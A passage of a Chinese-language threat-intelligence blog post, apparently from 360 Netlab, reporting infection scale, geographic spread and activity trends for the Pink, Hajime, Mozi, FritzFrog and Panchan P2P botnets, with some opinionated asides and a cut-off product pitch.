<li>&#x957F;&#x671F;&#x95F7;&#x58F0;&#xFF0C;&#x66F4;&#x65B0;&#x4E5F;&#x4E0D;&#x9891;&#x7E41;&#x3002;&#x5BF9;&#x4E8E;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x6765;&#x8BF4;&#xFF0C;&#x6BCF;&#x6B21;&#x201C;&#x589E;&#x52A0;&#x201D;&#x6216;&#x201C;&#x51CF;&#x5C11;&#x201D;&#x4F20;&#x64AD;&#x7B56;&#x7565;&#xFF0C;&#x4E00;&#x822C;&#x90FD;&#x4F1A;&#x5F15;&#x8D77;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x8282;&#x70B9;&#x6570;&#x91CF;&#x7684;&#x6CE2;&#x52A8;&#x3002;&#x800C;&#x4E0A;&#x8FF0;5&#x4E2D;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x5728;&#x8FD1;&#x671F;&#x5E76;&#x6CA1;&#x6709;&#x770B;&#x5230;&#x66F4;&#x65B0;&#x3002;&#x6240;&#x4EE5;&#x8282;&#x70B9;&#x6570;&#x91CF;&#x4F1A;&#x7EF4;&#x6301;&#x5728;&#x4E00;&#x4E2A;&#x76F8;&#x5BF9;&#x7A33;&#x5B9A;&#x7684;&#x72B6;&#x6001;&#x3002;</li>
<li>&#x5B83;&#x4EEC;&#x9020;&#x6210;&#x7684;&#x6076;&#x52A3;&#x5F71;&#x54CD;&#xFF0C;&#x8FD8;&#x4E0D;&#x8DB3;&#x4EE5;&#x4F7F;&#x5B89;&#x5168;&#x793E;&#x533A;&#x4EA7;&#x751F;&#x5F3A;&#x70C8;&#x7684;&#x6E05;&#x7406;&#x613F;&#x671B;&#x3002;&#x53E6;&#x4E00;&#x65B9;&#x9762;&#xFF0C;&#x5B83;&#x4EEC;&#x5F88;&#x957F;&#x4E00;&#x6BB5;&#x65F6;&#x95F4;&#x90FD;&#x6CA1;&#x6709;&#x66F4;&#x65B0;&#xFF0C;&#x4E5F;&#x6CA1;&#x6709;&#x673A;&#x4F1A;&#x5728;&#x5927;&#x4F17;&#x89C6;&#x91CE;&#x4E2D;&#x4EAE;&#x76F8;&#xFF0C;&#x8FD9;&#x4E5F;&#x4F1A;&#x964D;&#x4F4E;&#x5B89;&#x5168;&#x793E;&#x533A;&#x5904;&#x7F6E;&#x7684;&#x6B32;&#x671B;&#x3002;</li>
</ol>
<h1 id>&#x6309;&#x5BB6;&#x65CF;&#x5206;&#x522B;&#x7EDF;&#x8BA1;</h1>
<h2 id="pink">Pink</h2>
<p>Pink &#x5BB6;&#x65CF;&#x66FE;&#x5728;&#x4E2D;&#x56FD;&#x5883;&#x5185;&#x611F;&#x67D3;&#x4E86;&#x8D85;&#x8FC7;&#x767E;&#x4E07;&#x7EA7;&#x7684;&#x8BBE;&#x5907;&#xFF0C;&#x5176;&#x975E;&#x5B9E;&#x6548;&#x6027;&#x6307;&#x4EE4;&#x901A;&#x8FC7; P2P &#x4F20;&#x9012;&#xFF0C;&#x5B9E;&#x6548;&#x6027;&#x5F3A;&#x7684;&#x6307;&#x4EE4;&#x901A;&#x8FC7;&#x96C6;&#x4E2D;&#x63A7;&#x5236;&#x7684;&#x65B9;&#x5F0F;&#x53D1;&#x5E03;&#x3002;&#x662F;&#x4E00;&#x4E2A;&#x8BBE;&#x8BA1;&#x5DE7;&#x5999;&#x7684; P2P &#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x5BB6;&#x65CF;&#x3002;&#x66F4;&#x591A;&#x76F8;&#x5173;&#x4FE1;&#x606F;&#x53EF;&#x53C2;&#x8003;&#x6211;&#x4EEC;&#x66FE;&#x7ECF;&#x53D1;&#x5E03;&#x8FC7;&#x7684;&#x62A5;&#x544A;&#xFF1A;</p>
<p>&#x300A;<a href="https://blog.netlab.360.com/pink-en/">Pink, a botnet that competed with the vendor to control the massive infected devices</a>&#x300B;</p>
<p><strong>&#x5730;&#x7406;&#x5206;&#x5E03;</strong></p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/pink_world_map.png" alt="pink_world_map" loading="lazy"></p>
<p>&#x5982;&#x56FE;&#x6240;&#x793A;&#xFF0C;Pink&#x7684;&#x5F71;&#x54CD;&#x8303;&#x56F4;&#x662F;&#x4EE5;&#x56FD;&#x5185;IoT&#x8BBE;&#x5907;&#x4E3A;&#x4E3B;&#xFF0C;&#x4E0B;&#x9762;&#x662F;&#x5176;&#x5728;&#x56FD;&#x5185;&#x7684;&#x5206;&#x5E03;&#x60C5;&#x51B5;&#xFF1A;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/pink_china_map.png" alt="pink_china_map" loading="lazy"></p>
<p><strong>&#x65E5;&#x6D3B;&#x6CE2;&#x52A8;</strong></p>
<p>&#x503C;&#x5F97;&#x7279;&#x522B;&#x63D0;&#x5230;&#x7684;&#x662F;&#xFF0C;&#x8BE5;&#x5BB6;&#x65CF;7&#x6708;&#x4EFD;&#x4EE5;&#x6765;&#x7684;&#x65E5;&#x6D3B;&#x6570;&#x636E;&#x6709;&#x8F83;&#x5927;&#x7684;&#x6CE2;&#x52A8;&#xFF0C;&#x9996;&#x5148;&#x5728;7&#x6708;12&#x65E5;&#x5F00;&#x59CB;&#x7684;&#x4E00;&#x4E2A;&#x661F;&#x671F;&#x5185;&#x4E0B;&#x964D;&#x4E86;&#x4E00;&#x4E2A;&#x6570;&#x91CF;&#x7EA7;&#xFF0C;&#x65E5;&#x6D3B;&#x8FBE;&#x5230;2&#x4E07;&#x5DE6;&#x53F3;&#x7EA7;&#x522B;&#xFF0C;&#x968F;&#x540E;&#x5728;8&#x6708;20&#x65E5;&#x4E4B;&#x540E;&#x7684;&#x4E00;&#x6BB5;&#x65F6;&#x95F4;&#x77AC;&#x95F4;&#x5F52;&#x96F6;10&#x5929;&#x5DE6;&#x53F3;&#xFF0C;9&#x6708;&#x4EFD;&#x53C8;&#x56DE;&#x5230;2&#x4E07;&#x7EA7;&#x522B;&#x65E5;&#x6D3B;&#x3002;&#x65E5;&#x6D3B;&#x6CE2;&#x52A8;&#x60C5;&#x51B5;&#x53EF;&#x53C2;&#x770B;&#x4E0B;&#x56FE;&#xFF1A;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/09/pink_tracker-1.png" alt="pink_tracker-1" loading="lazy"></p>
<p>&#x4E3A;&#x4E86;&#x5206;&#x6790;&#x6CE2;&#x52A8;&#x539F;&#x56E0;&#xFF0C;&#x6211;&#x4EEC;&#x5206;&#x522B;&#x9009;&#x53D6; 7&#x6708;12&#x65E5;/7&#x6708;26&#x65E5;/9&#x6708;1&#x65E5; &#x7684;&#x65E5;&#x6D3B;&#x6570;&#x636E;&#x5206;&#x522B;&#x7ED8;&#x5236;&#x5730;&#x7406;&#x5206;&#x5E03;&#x56FE;&#xFF0C;&#x53D1;&#x73B0;&#xFF0C;&#x5927;&#x90E8;&#x5206;&#x7701;&#x4EFD;&#x7684;&#x65E5;&#x6D3B;&#x6570;&#x91CF;&#x53D1;&#x751F;&#x663E;&#x8457;&#x7684;&#x964D;&#x4F4E;&#x3002;&#x5982;&#x4E0B;&#x4E09;&#x56FE;&#x6240;&#x793A;&#xFF1A;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/09/pink_0712_china_map.png" alt="pink_0712_china_map" loading="lazy"></p>
<p><img src="https://blog.netlab.360.com/content/images/2022/09/pink_2022_07_26.png" alt="pink_2022_07_26" loading="lazy"></p>
<p><img src="https://blog.netlab.360.com/content/images/2022/09/pink_2022_09_01.png" alt="pink_2022_09_01" loading="lazy"></p>
<p>&#x57FA;&#x4E8E;&#x4EE5;&#x4E0A;&#x5185;&#x5BB9;&#xFF0C;&#x6211;&#x4EEC;&#x63A8;&#x6D4B;&#xFF0C;&#x5728;7&#x6708;&#x4EFD;&#xFF0C;&#x5404;&#x7701;&#x4EFD;&#x8FDB;&#x884C;&#x4E86;&#x8F83;&#x4E3A;&#x7EDF;&#x4E00;&#x7684;&#x5904;&#x7F6E;&#x5DE5;&#x4F5C;&#xFF0C;&#x4F7F;&#x53D7;&#x611F;&#x67D3;&#x8BBE;&#x5907;&#x7684;&#x6570;&#x91CF;&#x51FA;&#x73B0;&#x5927;&#x5E45;&#x4E0B;&#x964D;&#x3002;&#x800C;&#x5728;8&#x6708;&#x672B;&#x7684;&#x6CE2;&#x52A8;&#x4E2D;&#xFF0C;&#x5219;&#x66F4;&#x53EF;&#x80FD;&#x662F;&#x7C7B;&#x4F3C;&#x4E8E;&#x9632;&#x706B;&#x5899;&#x77ED;&#x671F;&#x89C4;&#x5219;&#x4EA7;&#x751F;&#x7684;&#x6548;&#x679C;&#xFF0C;&#x963B;&#x65AD;&#x4E86;&#x8DDF;&#x8E2A;&#x5668;&#x540C;PINK&#x8282;&#x70B9;&#x7684;&#x901A;&#x8BAF;&#x3002;</p>
<h2 id="hajime">Hajime</h2>
<p>Hajime &#x7684;&#x51FA;&#x73B0;&#x65F6;&#x95F4;&#x4E0E; MIRAI &#x540C;&#x5E74;&#xFF0C;&#x524D;&#x540E;&#x5DEE;&#x4E0D;&#x5230;&#x51E0;&#x4E2A;&#x6708;&#xFF0C;&#x5176;&#x63D0;&#x793A;&#x4FE1;&#x606F;&#x4E2D;&#x4E00;&#x76F4;&#x58F0;&#x79F0;&#x662F;&#x7531;&#x201C;&#x767D;&#x5E3D;&#x5B50;&#x201D;&#x8FD0;&#x8425;&#x7684;&#x3002;Hajime &#x7684;&#x5404;&#x7EC4;&#x4EF6;&#x529F;&#x80FD;&#x4E5F;&#x4EE5;&#x81EA;&#x4F20;&#x64AD;&#x4E3A;&#x4E3B;&#x8981;&#x76EE;&#x6807;&#x3002;&#x5176;&#x7EC4;&#x4EF6;&#x95F4;&#x7684;&#x901A;&#x8BAF;&#x53CA;&#x7BA1;&#x7406;&#xFF0C;&#x5927;&#x91CF;&#x4F7F;&#x7528;&#x4E86;&#x975E;&#x5BF9;&#x79F0;&#x52A0;&#x89E3;&#x5BC6;&#x7B97;&#x6CD5;&#x7684;&#x7279;&#x6027;&#xFF0C;&#x662F;&#x4E00;&#x4E2A;&#x6781;&#x4E3A;&#x7ECF;&#x5178;&#x7684; P2P &#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x5BB6;&#x65CF;&#x3002;&#x66F4;&#x591A;&#x8BE6;&#x7EC6;&#x8D44;&#x6599;&#x53EF;&#x53C2;&#x8003;&#x6211;&#x4EEC;&#x66FE;&#x7ECF;&#x53D1;&#x5E03;&#x8FC7;&#x7684;&#x62A5;&#x544A;&#xFF1A;</p>
<p>&#x300A;<a href="https://blog.netlab.360.com/hajime-status-report/">Is Hajime botnet dead?</a>&#x300B;</p>
<p><strong>&#x5730;&#x7406;&#x5206;&#x5E03;</strong></p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/hajime_world_map.png" alt="hajime_world_map" loading="lazy"></p>
<p><strong>&#x4F0A;&#x6717;&#x5C45;&#x9996;</strong></p>
<p>&#x4F5C;&#x4E3A;IT&#x4ECE;&#x4E1A;&#x8005;&#xFF0C;&#x63D0;&#x5230;&#x4F0A;&#x6717;&#xFF0C;&#x80FD;&#x60F3;&#x5230;&#x7684;&#x53EA;&#x6709;&#x201C;&#x4F0A;&#x6838;&#x534F;&#x8BAE;&#x201D;&#x6216;&#x8005;&#x201C;&#x5934;&#x5DFE;&#x201D;&#xFF0C;&#x4F3C;&#x4E4E;&#x5F88;&#x96BE;&#x628A;&#x5B83;&#x548C;&#x201C;&#x7535;&#x5B50;&#x5316;&#x201D;&#x626F;&#x4E0A;&#x5173;&#x7CFB;&#x3002;&#x5373;&#x4F7F;&#x662F;&#x591A;&#x6B21;&#x5728;IoT&#x8BBE;&#x5907;&#x611F;&#x67D3;&#x5217;&#x8868;&#x7684;&#x524D;&#x5217;&#x4E2D;&#x770B;&#x5230;&#x6765;&#x81EA;&#x4F0A;&#x6717;&#x7684;IP&#xFF0C;&#x4E5F;&#x603B;&#x89C9;&#x5F97;&#x4F0A;&#x6717;&#x4E0D;&#x4F1A;&#x6709;&#x90A3;&#x4E48;&#x591A;&#x7684;&#x667A;&#x80FD;&#x8BBE;&#x5907;&#xFF0C;&#x5927;&#x6982;&#x662F;&#x6570;&#x636E;&#x5931;&#x771F;&#x4E86;&#x3002;</p>
<p>&#x8FD1;&#x671F;&#x6709;&#x673A;&#x4F1A;&#x5728;&#x201C;&#x4FC4;&#x4E4C;&#x6218;&#x573A;&#x201D;&#x4E0A;&#x770B;&#x5230;&#x201C;<a href="https://zhuanlan.zhihu.com/p/576038888?ref=blog.netlab.360.com">&#x4F0A;&#x6717;&#x65E0;&#x4EBA;&#x673A;</a>&#x201D;&#x53D1;&#x6325;&#x7684;&#x6548;&#x679C;&#xFF0C;&#x53EF;&#x4EE5;&#x8BF4;&#x662F;&#x633A;&#x8D85;&#x51FA;&#x9884;&#x671F;&#x7684;&#x3002;&#x73B0;&#x5728;&#x7B14;&#x8005;&#x5F00;&#x59CB;&#x60F3;&#xFF0C;&#x5982;&#x679C;&#x6392;&#x9664;&#x6570;&#x636E;&#x5931;&#x771F;&#xFF0C;&#x5C31;&#x610F;&#x5473;&#x7740;&#x4F0A;&#x6717;&#x5728;&#x4E00;&#x4E9B;&#x5730;&#x65B9;&#x662F;&#x8D85;&#x51FA;&#x591A;&#x6570;&#x4EBA;&#x60F3;&#x8C61;&#x7684;&#xFF0C;&#x867D;&#x7136;&#x770B;&#x5230;&#x7684;&#x8FD9;&#x4E9B;&#x4E1C;&#x897F;&#x8FD8;&#x8FDC;&#x8C08;&#x4E0D;&#x4E0A;&#x5148;&#x8FDB;&#xFF0C;&#x4F46;&#x662F;&#x4ED6;&#x4EEC;&#x80FD;&#x5927;&#x91CF;&#x7684;&#x5236;&#x9020;&#x65E0;&#x4EBA;&#x673A;&#xFF0C;&#x63D0;&#x7EAF;&#x6838;&#x539F;&#x6599;&#xFF0C;&#x7F51;&#x7EDC;&#x4E0A;&#x8FD8;&#x6709;&#x7740;&#x5927;&#x91CF;&#x7684;&#x667A;&#x80FD;&#x8BBE;&#x5907;&#xFF0C;&#x8FD9;&#x4E9B;&#x4FA7;&#x9762;&#x90FD;&#x8868;&#x660E;&#x4ED6;&#x4EEC;&#x5728;&#x201C;&#x5DE5;&#x4E1A;&#x5316;&#x201D;&#x548C;&#x201C;&#x7535;&#x5B50;&#x5316;&#x201D;&#x4E0A;&#x662F;&#x6709;&#x79EF;&#x7D2F;&#x7684;&#xFF0C;&#x80CC;&#x540E;&#x80AF;&#x5B9A;&#x6709;&#x5927;&#x91CF;&#x53D7;&#x8FC7;&#x9AD8;&#x7B49;&#x6559;&#x80B2;&#x7684;&#x5DE5;&#x7A0B;&#x5E08;&#x3002;&#x4ED6;&#x4EEC;&#x6709;&#x7740;&#x548C;&#x4E2D;&#x897F;&#x65B9;&#x5B8C;&#x5168;&#x4E0D;&#x540C;&#x7684;&#x6587;&#x5B57;&#x548C;&#x6587;&#x5316;&#xFF0C;&#x6B63;&#x5728;&#x53E6;&#x4E00;&#x4E2A;&#x4E16;&#x754C;&#x91CC;&#x7325;&#x7410;&#x53D1;&#x80B2;&#x5462;&#x3002;</p>
<p><strong>Hajime &#x4E2D;&#x7684;CPU&#x5206;&#x5E03;&#x60C5;&#x51B5;</strong></p>
<p>Hajime&#x662F;&#x57FA;&#x4E8E;&#x6587;&#x4EF6;&#x4F20;&#x9012;&#x6784;&#x5EFA;&#x7684;P2P&#x7F51;&#x7EDC;&#xFF0C;&#x6BCF;&#x4E2A;Hajime&#x5728;&#x8FD0;&#x884C;&#x671F;&#x95F4;&#xFF0C;&#x4F1A;&#x5C1D;&#x8BD5;&#x5BFB;&#x627E;&#x6700;&#x65B0;&#x7248;&#x672C;&#x7684; .i.xxx &#x548C; atk.xxx &#x6587;&#x4EF6;(&#x6BD4;&#x5982;&#xFF1A;atk.arm7/.i.arm7)&#xFF0C;&#x8FD9;&#x5C31;&#x7ED9;&#x4E86;&#x6211;&#x4EEC;&#x8BC4;&#x4F30;&#x201C;Hajime&#x7F51;&#x7EDC;&#x201D;&#x4E2D; CPU &#x5206;&#x5E03;&#x60C5;&#x51B5;&#x7684;&#x4E00;&#x4E2A;&#x673A;&#x4F1A;&#x3002;&#x5F53; Hajime &#x8282;&#x70B9;&#x5411;&#x6211;&#x65B9;&#x8BE2;&#x95EE;&#x54EA;&#x4E9B;&#x8282;&#x70B9;&#x5305;&#x542B;&#x76F8;&#x5E94;&#x6587;&#x4EF6;&#x65F6;&#xFF0C;&#x4F1A;&#x5F97;&#x5230;&#x4E00;&#x6B21; DHT.search &#x8BA1;&#x6570;&#x3002;&#x5F53; Hajime &#x8282;&#x70B9;&#x5411;&#x6211;&#x65B9;&#x8BF7;&#x6C42;&#x4E0B;&#x8F7D;&#x76F8;&#x5E94;&#x6587;&#x4EF6;&#x65F6;&#xFF0C;&#x4F1A;&#x5F97;&#x5230;&#x4E00;&#x6B21; uTP.Request &#x8BA1;&#x6570;&#x3002;&#x4E24;&#x79CD;&#x6587;&#x4EF6;&#xFF0C;&#x4E24;&#x79CD;&#x8BA1;&#x6570;&#xFF0C;&#x6C47;&#x603B;&#x540E;&#x5C31;&#x53EF;&#x4EE5;&#x5F97;&#x5230;&#x5982;&#x4E0B;&#x56DB;&#x5F20;&#x997C;&#x56FE;&#x5206;&#x5E03;&#x60C5;&#x51B5;&#xFF1A;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/hajime_cpu_count-2.png" alt="hajime_cpu_count-2" loading="lazy"></p>
<p>&#x57FA;&#x4E8E;&#x4EE5;&#x4E0A;&#x997C;&#x56FE;&#xFF0C;&#x6211;&#x4EEC;&#x53EF;&#x4EE5;&#x786E;&#x5B9A;&#xFF0C;&#x5728; Hajime &#x7F51;&#x7EDC;&#x4E2D;&#xFF0C;MIPS &#x7684;&#x5BBF;&#x4E3B;&#x6700;&#x591A;&#xFF0C;&#x8FDC;&#x8D85;&#x5176;&#x4ED6;&#x7C7B;&#x578B;&#x5BBF;&#x4E3B;&#x4E4B;&#x548C;&#xFF0C;&#x800C;MIPSEL &#x7684;&#x5BBF;&#x4E3B;&#x8282;&#x70B9;&#x6700;&#x5C11;&#x3002;</p>
<p>&#x5982;&#x679C;&#x8003;&#x8651;&#x5230; Hajime &#x66FE;&#x96C6;&#x6210;&#x8FC7;&#x5927;&#x91CF;&#x7684;&#x6F0F;&#x6D1E;&#x7528;&#x4E8E;&#x4F20;&#x64AD;&#xFF0C;&#x8FD9;&#x4E2A;&#x6570;&#x636E;&#x751A;&#x81F3;&#x53EF;&#x4EE5;&#x5728;&#x4E00;&#x5B9A;&#x7A0B;&#x5EA6;&#x53CD;&#x5E94;&#x5404;&#x7C7B;&#x578B;CPU&#x5728;&#x667A;&#x80FD;&#x8BBE;&#x5907;&#x4E2D;&#x7684;&#x5206;&#x5E03;&#x60C5;&#x51B5;&#x3002;</p>
<h2 id="mozi">Mozi</h2>
<p>Mozi &#x8D77;&#x521D;&#x662F;&#x4E00;&#x4E2A;&#x4EE5; DDoS&#x653B;&#x51FB; &#x4E3A;&#x83B7;&#x76CA;&#x76EE;&#x6807;&#x7684;P2P&#x5BB6;&#x65CF;&#xFF0C;&#x540E;&#x6765;&#x8FD8;&#x589E;&#x52A0;&#x4E86;&#x6316;&#x77FF;&#x83B7;&#x76CA;&#x7684;&#x90E8;&#x5206;&#x3002;&#x5176;&#x7F51;&#x7EDC;&#x62D3;&#x6251;&#x662F;&#x4EE5; DHT &#x534F;&#x8BAE;&#x4E3A;&#x57FA;&#x7840;&#xFF0C;&#x6784;&#x5EFA;&#x8D77;&#x6765;&#x7684;&#x3002;&#x66F4;&#x591A;&#x7684;&#x4FE1;&#x606F;&#x53EF;&#x4EE5;&#x53C2;&#x8003;&#x6211;&#x4EEC;&#x53D1;&#x5E03;&#x8FC7;&#x7684;&#x62A5;&#x544A;&#x3002;</p>
<p>&#x300A;<a href="https://blog.netlab.360.com/mozi-another-botnet-using-dht/">Mozi, Another Botnet Using DHT</a>&#x300B;</p>
<p>&#x300A;<a href="https://blog.netlab.360.com/the-mostly-dead-mozi-and-its-lingering-bots/">The Mostly Dead Mozi and Its&#x2019; Lingering Bots</a>&#x300B;</p>
<p><strong>&#x5730;&#x7406;&#x5206;&#x5E03;</strong></p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/mozi_world_map.png" alt="mozi_world_map" loading="lazy"></p>
<p>&#x4ECE;&#x6392;&#x540D;&#x4E0A;&#x770B;&#xFF0C;&#x7B2C;&#x4E00;&#x4E25;&#x91CD;&#x662F;&#x4E2D;&#x56FD;&#xFF0C;&#x7B2C;&#x4E8C;&#x4E25;&#x91CD;&#x662F;&#x5370;&#x5EA6;&#x3002;&#x524D;&#x4E24;&#x5E74;&#x4E2D;&#x5370;&#x8FB9;&#x5883;&#x95F9;&#x78E8;&#x64E6;&#x7684;&#x65F6;&#x5019;&#xFF0C;&#x6B63;&#x8D76;&#x4E0A;&#x5927;&#x91CF; Mozi &#x7684;&#x8282;&#x70B9;&#x4ECE;&#x5370;&#x5EA6;&#x626B;&#x63CF;&#x56FD;&#x5185;&#x8BBE;&#x5907;&#xFF0C;&#x8FD8;&#x95F9;&#x7684;&#x5927;&#x5BB6;&#x6709;&#x4E9B;&#x7D27;&#x5F20;&#x3002;&#x540E;&#x6765;&#x561B;&#xFF0C;&#x6293;&#x5230;&#x4EBA;&#x4E86;&#xFF0C;&#x5C31;&#x53C8;&#x4E0D;&#x90A3;&#x4E48;&#x7D27;&#x5F20;&#x4E86;&#x3002;</p>
<h2 id="fritzfrog">FritzFrog</h2>
<p>FritzFrog &#x662F;&#x4E00;&#x4E2A;&#x4EE5;&#x6316;&#x77FF;&#x4E3A;&#x83B7;&#x76CA;&#x76EE;&#x6807;&#x7684; P2P &#x5BB6;&#x65CF;&#xFF0C;&#x5176;&#x4F9D;&#x6258;&#x4E8E; SSH&#x670D;&#x52A1;&#x6784;&#x5EFA;&#x8D77; P2P&#x7F51;&#x7EDC;&#x3002;&#x7531; akamai &#x6700;&#x5148;&#x62AB;&#x9732;&#x3002;&#x66F4;&#x591A;&#x8BE6;&#x7EC6;&#x8D44;&#x6599;&#x53EF;&#x53C2;&#x8003;&#x4E0B;&#x9762;&#x7684;&#x62A5;&#x544A;&#xFF08;&#x6709;&#x8DA3;&#x7684;&#x662F;&#xFF0C;&#x5B83;&#x7684;&#x6536;&#x76CA;&#x94B1;&#x5305;&#x5730;&#x5740;&#x548C; Mozi &#x6709;&#x5173;&#xFF09;&#xFF1A;</p>
<p>&#x300A;<a href="https://www.akamai.com/blog/security/fritzfrog-p2p?ref=blog.netlab.360.com">FritzFrog: P2P Botnet Hops Back on the Scene</a>&#x300B;</p>
<p><strong>&#x5730;&#x7406;&#x5206;&#x5E03;</strong></p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/fritzfrog_world_map.png" alt="fritzfrog_world_map" loading="lazy"></p>
<p><strong>FritzFrog&#x4E2D;&#x7684;&#x8D26;&#x6237;&#x53E3;&#x4EE4;</strong></p>
<p>&#x7531;&#x4E8E; FritzFrog &#x7684;P2P&#x673A;&#x5236;&#x662F;&#x57FA;&#x4E8E;SSH&#x5B9E;&#x73B0;&#x7684;&#xFF0C;&#x6240;&#x4EE5;&#x722C;&#x53D6;&#x56DE;&#x6765;&#x7684;&#x6570;&#x636E;&#x4E2D;&#x5B58;&#x5728;&#x5BBF;&#x4E3B;&#x673A;&#x5668;&#x53E3;&#x4EE4;&#x7EC4;&#x5408;&#xFF0C;&#x6211;&#x4EEC;&#x53EF;&#x4EE5;&#x770B;&#x4E00;&#x4E0B;&#x53E3;&#x4EE4;&#x7EC4;&#x5408;&#x7684;&#x5206;&#x5E03;&#x60C5;&#x51B5;&#xFF0C;&#x7EDF;&#x8BA1;&#x4E00;&#x4E0B;&#x54EA;&#x4E9B;&#x53E3;&#x4EE4;&#x8D21;&#x732E;&#x4E86;&#x6700;&#x591A;&#x7684;&#x5BBF;&#x4E3B;&#x673A;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/10/fritzfrog_user_pass.png" alt="fritzfrog_user_pass" loading="lazy"></p>
<p>&#x7EC4;&#x5408;&#x6392;&#x540D;&#x7B2C;&#x4E00;&#x7684;&#x662F;&#x4E00;&#x4E2A;<code>1</code> &#x5F00;&#x5934;&#x7684;&#x5BC6;&#x7801;&#xFF0C;&#x6709;&#x770B;&#x5BA2;&#x80FD;&#x628A;&#x5B83;&#x8865;&#x5168;&#x4E0D;&#xFF1F;</p>
<h2 id="panchan">Panchan</h2>
<p>Panchan &#x662F;&#x4E00;&#x4E2A; Go &#x8BED;&#x8A00;&#x5F00;&#x53D1;&#x7684; P2P &#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#xFF0C;&#x4EE5;&#x6316;&#x77FF;&#x4E3A;&#x83B7;&#x76CA;&#x624B;&#x6BB5;&#xFF0C;&#x5229;&#x7528; SSH &#x5F31;&#x53E3;&#x4EE4;&#x4E3A;&#x4F20;&#x64AD;&#x9014;&#x5F84;&#x3002;&#x5176;&#x4EE3;&#x7801;&#x4E2D;&#x5305;&#x542B;&#x5927;&#x91CF; &#x65E5;&#x6587;&#x7247;&#x5047;&#x540D;&#xFF0C;&#x8FD9;&#x8868;&#x660E; Panchan &#x7684;&#x5F00;&#x53D1;&#x8005;&#x53EF;&#x4EE5;&#x719F;&#x7EC3;&#x4F7F;&#x7528;&#x65E5;&#x6587;&#x3002;&#x53E6;&#x4E00;&#x4E2A;&#x6709;&#x8DA3;&#x7684;&#x70B9;&#x5728;&#x4E8E;&#xFF1A;&#x5B83;&#x5728;&#x76D1;&#x542C;&#x7AEF;&#x53E3;&#x4E0A;&#xFF0C;&#x5229;&#x7528;&#x534F;&#x8BAE;&#x590D;&#x7528;&#x7684;&#x601D;&#x8DEF;&#x5B9E;&#x73B0;&#x4E86;&#x4E00;&#x4E2A;&#x4EA4;&#x4E92;&#x63A7;&#x5236;&#x53F0;&#xFF0C;&#x5141;&#x8BB8;&#x7BA1;&#x7406;&#x5458;&#x4ECE;&#x7F51;&#x7EDC;&#x4E0A;&#x5BF9;&#x8282;&#x70B9;&#x8FDB;&#x884C;&#x4E00;&#x4E9B;&#x7B80;&#x5355;&#x7684;&#x67E5;&#x8BE2;&#x548C;&#x7BA1;&#x7406;&#x5DE5;&#x4F5C;&#x3002;&#x66F4;&#x591A;&#x8BE6;&#x7EC6;&#x4FE1;&#x606F;&#x53EF;&#x53C2;&#x8003;&#x5982;&#x4E0B;&#x62A5;&#x544A;&#xFF1A;</p>
<p>&#x300A;<a href="https://www.akamai.com/blog/security/new-p2p-botnet-panchan?ref=blog.netlab.360.com">Panchan&#x2019;s Mining Rig: New Golang Peer-to-Peer Botnet Says &#x201C;Hi!&#x201D;</a>&#x300B;</p>
<p><strong>&#x5730;&#x7406;&#x5206;&#x5E03;</strong></p>
<p>panchan &#x7684;&#x65E5;&#x6D3B;&#x957F;&#x671F;&#x7A33;&#x5B9A;&#x5728;&#x4E24;&#x4F4D;&#x6570;&#xFF0C;&#x76F8;&#x6BD4;&#x5176;&#x4ED6;&#x51E0;&#x4E2A;&#x52A8;&#x8F84;5&#x4F4D;&#x6570;&#x65E5;&#x6D3B;&#x7684;&#x5BB6;&#x65CF;&#x6765;&#x8BF4;&#xFF0C;&#x611F;&#x67D3;&#x89C4;&#x6A21;&#x5E76;&#x4E0D;&#x7B97;&#x5927;&#x3002;</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/panchan_world_map-1.png" alt="panchan_world_map-1" loading="lazy"></p>
<p>&#x522B;&#x88AB;&#x7F8E;&#x56FD;&#x7684;&#x7EA2;&#x8272;&#x5413;&#x5230;&#xFF0C;&#x5176;&#x5B9E;&#x53EA;&#x6709;14&#x4E2A;&#x65E5;&#x6D3B;&#x3002;</p>
<h1 id>&#x7ED3;&#x8BBA;</h1>
<p>&#x672C;&#x6587;&#x5229;&#x7528;&#x8DDF;&#x8E2A;&#x6570;&#x636E;&#xFF0C;&#x7EFC;&#x5408;&#x8BC4;&#x4F30;&#x4E86;&#x5404; P2P &#x578B;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x7684;&#x89C4;&#x6A21;&#x548C;&#x6D3B;&#x8DC3;&#x60C5;&#x51B5;&#xFF0C;&#x5E76;&#x4ECE;&#x4E0D;&#x540C;&#x7684;&#x8DDF;&#x8E2A;&#x6570;&#x636E;&#x4E2D;&#x770B;&#x5230;&#x4E86;&#x4E00;&#x4E9B;&#x7F51;&#x7EDC;&#x5B89;&#x5168;&#x4EE5;&#x5916;&#x7684;&#x73B0;&#x8C61;&#x3002;</p>
<h1 id>&#x89E3;&#x51B3;&#x65B9;&#x6848;</h1>
<p>&#x57FA;&#x4E8E;Netlab&#x591A;&#x5E74;&#x7814;&#x7A76;&#x5DE5;&#x4F5C;&#x5B75;&#x5316;&#x7684;360&#x5168;&#x7CFB;&#x5217;DNS&#x5B89;&#x5168;&#x4EA7;&#x54C1;&#x5747;&#x5DF2;&#x652F;&#x6301;&#x6587;&#x4E2D;&#x8FDC;&#x63A7;&#x670D;&#x52A1;&#x5668;&#x7684;&#x62E6;&#x622A;&#x548C;&#x68C0;&#x6D4B;&#xFF0C;&#x540C;&#x65F6;&#x5185;&#x7F6E;&#x591A;&#x79CD;&#x7B97;&#x6CD5;&#x53EF;&#x6709;&#x6548;&#x53D1;&#x73B0;&#x548C;&#x62E6;&#x622A;&#x5404;&#x79CD;&#x672A;&#x77E5;&#x5A01;&#x80C1;&#xFF0C;&#x5EFA;&#x8BAE;&#x4F01;&#x4E1A;&#x5BA2;&#x6237;&#x63A5;&#x5165;360 